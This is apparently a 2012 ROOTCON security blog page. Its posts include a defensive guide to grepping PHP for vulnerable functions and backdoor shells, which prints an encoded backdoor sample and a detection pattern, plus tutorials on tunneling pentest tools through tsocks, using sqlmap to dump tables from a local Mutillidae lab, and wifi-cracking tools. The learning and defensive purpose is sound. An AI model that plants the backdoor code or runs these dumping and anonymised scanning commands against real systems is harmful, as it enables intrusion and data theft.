Pages

Simple Kung Fu Grep for Finding Common Web Vulnerabilities & Backdoor Shells

26.4.12 Posted by: ROOTCON

Grep is a powerful command-line tool in Unix and Linux used for searching and probing data sets for lines that matches a regular expression. As a short history, this utility was coded by Ken Thompson on March 3, 1973 for Unix.

Here is a sample or common usage of the said tool for searching a text string pBot in my php file bot.php:

grep pbot bot.php
Alright let's proceed on the objective of this article which is to find common vulnerabilities, backdoor shells and other malicious files using the grep command. For this writeup I'm using grep version 2.9 so if you are using a an older version of GNU grep which is below 2.5.4,  some of the commands in this article may not work although grep. To determine the version of grep you can just type grep -V or grep --version in your terminal. For the other commands and arguments that can be appended to this command line kung fu, you can also type grep --help for more information.
Common Usage for Finding Vulnerabilities
The very reason why most web applications can be easily hacked or pawned because of insecure codes and functions that can be exploited. Take for example command injection or also known as remote code execution in terms of web exploitation, can be possible to a certain website accepts added strings of characters or arguments; the inputs are used as arguments for executing the command in the web server. And because most vulnerable web applications use the shell_exec function. We can use the grep command to search for the shell_exec in as our advantage in our /var/www directory to check for the possible PHP files that are vulnerable to RCE or command injection. Here is the command: 

grep -Rn "shell_exec *( " /var/www

In the image above, we can see that it displays the path of the vulnerable script and the line of the function.

Another example: the include, require, include_once and require_once functions which are common PHP functions in a vulnerable script that is possible for LFI or Local File Inclusion which is 
a kind of exploit or vulnerability that allows an attacker to inject directory traversal characters on a certain website. 

Again, we can use these functions for searching possible vulnerable scripts in our web server:

grep -Rn "include *(" /var/www
grep -Rn "require *(" /var/www
grep -Rn "include_once *(" /var/www
grep -Rn "require_once *(" /var/www
There are other PHP functions out there that can also be used for finding other web vulnerabilities. Just use Google for other functions :)

Grepping for Backdoor Shells and other Malicious Files


Backdoors are used by web defacers and hackers to maintain access on the web server which allows them to execute arbitrary commands, download files, edit files, and for back-connection. Most backdoor shells use the shell_exec function for command execution. And because most anti-viruses and rootkit scanners can detect backdoor shells, attackers use PHP encoders for evasion. But because functions like base64_decode and eval are used in this technique, they can't escape the wrath of grep. Here is a sample backdoor shell that has upload and system information functions only encoded using Carbylamine PHP Encoder:


<?php function KJnPCP($XZK)


{
$XZK=gzinflate(base64_decode($XZK));
for($i=0;$i<strlen($XZK);$i++)
{
$XZK[$i] = chr(ord($XZK[$i])-1);
}
return $XZK;
}
eval(KJnPCP("U1QEAm4gzkrXzCopSSvVVE3wcAuN0SjJTMvN1YjT0lJMS8ks
0FS2LSxOs1fWBwsnpFWmpaAp1FdWVFfW0le2NQAr1LLBZmhhZiHCyLTypF
zNktLirMKUktwkoDElaMqwmwHSizAEVdCG28GeGwA="));
?>

Aside from shell_exec, base64_decode, and eval; here are other functions used by PHP backdoor shells:

phpinfo

system
php_uname
chmod
fopen
flclose
readfile
edoced_46esab
passthru

Thus you could also easliy grep these functions:


grep -Rn "shell_exec *(" /var/www
grep -Rn "base64_decode *(" /var/www
grep -Rn "phpinfo *(" /var/www
grep -Rn "system *(" /var/www
grep -Rn "php_uname *(" /var/www
grep -Rn "chmod *(" /var/www
grep -Rn "fopen *(" /var/www
grep -Rn "fclose *(" /var/www
grep -Rn "readfile *(" /var/www
grep -Rn "edoced_46esab *(" /var/www
grep -Rn "eval *(" /var/www 
grep -Rn "passthru *(" /var/www
 
In my recent analysis, some of these functions are used by IRC bots that have malicious functions like vulnerability scanners, automatic backdoor bots, DoS bots, udpflooder bots, etc.

Oh, and you might wanna add tcpflood and udpflood strings for grepping malicious files too because these are commonly used by IRC bots that have udpflood and tcpflood functions.
What you saw from the image above is a sample of a pBot which is a PHP IRC bot  used by some attackers to initiate DDoS (Distributed Denial of Service) / DoS (Denial of Service) attacks.

We can also list all these common functions by using this command in your terminal:


grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab) *\(" /var/www

References: 
http://25yearsofprogramming.com/blog/2010/20100315.htm
http://php.net/

About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

ClubHack Magazine April 2012 Issue Released!

14.4.12 Posted by: ROOTCON


India's 1st Hacking Magazine which is ClubHack or CHmag has just released their April 2012 Issue. CHmag happens to be our media partner and that CHMag is one of the hacking/infosec magazines I'm currently following because of the good contents from various authors  and for this issue I also contributed an article for the Mom's Guide. Here are the topics for this month's issue:
-Decoding ROT using the Echo and Tr Commands in your Linux Terminal
-How to enable WiFi on Matriux running inside VMWare
-Local File Inclusion
-Poster of the Month
-Provisions of Sec. 66B
-Sysinternals Suite
-XSS – The Burning issue in Web Application
The new burner for this issue is the new section which is the Code Gyan that started with a new topic entitled Local File Inclusion.

You can download the PDF File here or you could check out the archives for their previous issues in their official website.


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Tunneling the Applications you launched on your Terminal with Tsocks

12.4.12 Posted by: ROOTCON

With some of the applications that don't have proxy configurations or settings, how can we add anonymity to our information gathering, scanning, exploiting phases, etc. like nmapping, using theharvester to gather emails, and many more? It's bad leaving your footprints and logs right?

Well if we have tsocks application then it would be easier since it can send TCP connections automatically through a SOCKS server. If tsocks is not installed on your distro, you can just find it on the software repository. In my case, BackBox Linux has tsocks pre-installed. It can be used for TORifying or tunneling your applications that doesn't have proxy capabilities. Supposed I opened a certain SSH server then binded my localhost at 9191 TCP port, I need to configure /etc/tsocks.conf to:

local = 192.168.0.0/255.255.255.0

server = 127.0.0.1

server_type = 5

server_port = 9191
For TOR, you can just edit the server_port to 9050 because it opens a SOCKS local server at 9050 TCP port.

ssh -D 9191 user@hostname

After configuring tsocks, try to check if tsocks is working good by using the lynx web browser to connect to a website that tells you if you are tunneled or you could also tunnel to another ssh server and issue the command w/who. Be sure to put tsocks before the command. For example:

tsocks lynx whatismyip.net

The IP of the SSH Server ;)

The image below is my original IP without using ssh tunneling:


See the difference ayt!

So if I want to launch theharvester (email harvester) anonymously, I need add tsocks before theharvester command:

tsocks theharvester -d rootcon.org -l 500 -b google


 Now you can run your pentesting tools with added anonymity :)


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

ROOTCON Easter Egg Solution

8.4.12 Posted by: ROOTCON

The ROOTCON Easter Egg Hunt is over, the hunt was pretty simple and straight forward, you just need to know some of the basic arsenal in your day to day hacking escapade.

The Solution:

Easter Egg #1 = The image show Master Yoda speaking the very familiar line "May the source be with you" followed by "A n00b you are". If you are a geek and into tech, you wouldn't miss watching Star Wars, the line "May the force be with you", was replaced with source, meaning it's giving you a hint that the first egg can be found on the source code of the page egg1.php

Easter Egg #2 = Easter Egg #2 has something to deal with braille, we gave the hint "3 blind mice", so you need to decode the braille dots into letters.

Easter Egg #3 = The ROOTCON Vault, this is pretty easy, you can de-crypt the vault using uudecode, or even Perl can unpack it. The first line of the vault says Begin blah blah, this should give you enough hint how it was being encrypted.

Easter Egg #4 = This Easter Egg is very simply, the picture of Cookie Monster says it all plus the text we placed. "Cookie" Monster. "No Cookie For You". The hint tells you that the next word is hidden under the site cookie. There are a lot of Add-ons, Plugins for browsers that will let you examine what is written off its cookie, Google Chrome has its native tool to do that "Developer Tools"

Easter Egg #5 = Again going back to the "image text" for hints, it says "Undress the ROOTCON Easter Bunny". The easter bunny is an image, to undress or to get information under an image you need to examine the EXIF attributes found on the image.

Only the first one to crack all the codes who will be entitle for the 50% discount offer for the ROOTCON 6 ticket.

Here are the top four winners (Click the image to enlarge)
(Note: We masked the Lastname of the winners to protect their identity)




I hope everyone enjoyed our little Easter Special.

ROOTCON


ROOTCON Easter Egg Hunt

7.4.12 Posted by: ROOTCON

Here we go, ROOTCON Easter Egg Hunt.

Instructions (Read Carefully)
1. Search for each word contained on each egg
2. Gather all words found on each egg
3. Combine all words into one
4. Send your code to registration [at] rootcon d0t org
5. You are entitled for a 50% discount ;-)

Start cracking some eggs at http://easteregg.rootcon.org/

Remember: This is a race, so the promo code is valid for one use only 

GOOD LUCK!!! and HAPPY EASTER 

Dumping Like a Boss - sqlmap 101

7.4.12 Posted by: ROOTCON


SQLmap is one of the most common used tools for web application penetration testing because it is open source and automates an sql injection attacks which also allows you to spawn a shell. It has full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB DBMS/ Database Management System. It is also coded in python.

To check all the attributes and options for this tool type sqlmap -h on your terminal.

Suppose we have a vulnerable link after checking it, we append URL target with --dbs to check for the databases:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' --dbs

After that we should be able to see the back-end DBMS, web server, and most importantly the databases.


Databases enumerated:
[*] dvwa
[*] information_schema
[*] mysql
[*] owasp10

Now let's check all the tables for the owasp10 database. This is the database for the Mutillidae Web Application.

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 --tables


Tables enumerated:
+------------------------+
| accounts
| blogs_table
| captured_data
| credit_cards
| hitlog
| pen_test_tools
+-------------------------+


Now let's try to dump all the columns for the accounts table:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T accounts --dump


Right, we got columns cid, mysignature, password and username =)

Similar query: Select * from accounts;

Now's let's try dumping the credit_cards table:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T credit_cards --dump


Similar query: Select * from credit_cards;

Well, that should be it! I hope you were able to understand how to use sqlmap to dump the tables of a certain database.


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

3 Common Automated Tools with GUI Used for Wireless Cracking / Pentesting

6.4.12 Posted by: ROOTCON

1. wifite

wifite is a mass WEP/WPA WiFi Cracker that is coded in python which makes cracking WIFI passwords and security easier, it uses the aircrack-ng suite. It can be executed by using the command line python wifite.py or ./wifite.py. To see a list of command lines with detailed information for the script, you can just type in the terminal ./wifite.py –help or python wifite.py –help. What makes this tool easier is that it also has a GUI mode which runs by default after executing the script if it has a python-tk module. You can download the python script here.



2. Fern WIFI Cracker

Fern Wifi Cracker is another GUI for easier wireless penetration testing which uses the aircrack-ng suite of tools. It is coded in python and uses python-qt4. Very similar to wifite because you need macchanger, xterm, and aircrack-ng as its prerequisites. But uses  python-qt4 instead of python-tk for the GUI. You can download this project here.


3. Gerix Wifi Cracker

Gerix Wifi Cracker a simple graphical user interface just like wifite and Fern Wifi Cracker. It is a project made by Tiger Security and has been one of the tools added in BackTrack Linux since the BackTrack 4 Pre-Final if I'm not mistaken. It's also coded in python and you surely need qt (v.3) for this. You can download it here or if you are using BackTrack, you should be able to find this tool in /usr/share/gerix-wifi-cracker-ng.



About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

We want you to come!!!

3.4.12 Posted by: ROOTCON

We want you to able to join the fun and learning we share at ROOTCON, with that we made it easy for everyone to get approval from you boss and HR personnel. You may download our pre-formatted and digitally signed Letter Of Approval.

Download the Letter Of Approval  

Call For InfoSec Celebs

3.4.12 Posted by: ROOTCON


Who Wants To Speak?

ROOTCON is looking for InfoSec Celebrities both local and internationl. If you think you have the skills and talents to be one of the InfoSec celebrities we will be delighted if you will join us =)

As a backgrounder ROOTCON is a grassroots event, organized by users for users.  We welcome attendees from all over the world, after all security is borderless and global in nature.   We support sharing best practices and appreciate cooperation from our international supporters.  If you would like to speak at our event and reside outside the Philippines, we will be happy to sponsor your hotel but are currently not able to sponsor any international airfares due to our volunteer-driven organization.  


 Support the Hacker Community Globally!!!

Hackers Unite

ROOTCON 6 Registration Now Live!!!

3.4.12 Posted by: ROOTCON

This year's ROOTCON is much awesome with our selected tracks and carefully planned activities. April 1, 2012 we are pleased to announce that the early registration for ROOTCON 6 is now live.

Our updated tracks (here) updated real time
Our awesome speakers (here)
This year's venue (here)


Last year we had two Registration methods: Paypal and Offline payment (manually sending out email to registration [at] rootcon dot org). The tagging of attendees was pretty hard for the ROOTCON crew, thus, this year we opted to have a new registration system which is EventBrite. You will still have the option to pay offline or pay through PayPal but the up-side for us is that tagging of attendees and slots is much more precise, so we won't be re-opening the registration over and over again after we recount our available slots.

On the new registration system there will still be offline payments through direct deposit and there will also be PayPal payments. You will still receive an e-ticket for the event marked as payment-not-received, however, your reservation will stay on the system for 48 hours, FAILURE OF PAYMENT WITHIN 48 HOURS WILL FORFEIT YOUR RESERVATION. If you deposited your payment already, send us a copy of the scanned deposit slip to registration [at] rootcon dot org with subject [ROOTCON 6 REGISTRATION - YOUR NAME] and we will be sending you another e-ticket marked as payment-received. For Paypal payment you will receive your e-ticket right away after you purchase them.

PRINT YOUR E-TICKET and BRING THEM TO THE CONFERENCE CHECK-IN DESK TO RECEIVE YOUR BADGE AND OTHER FREEBIES

What our you waiting for GRAB YOUR TICKET NOW!!!!

See you at the CON
Semprix and the ROOTCON Crew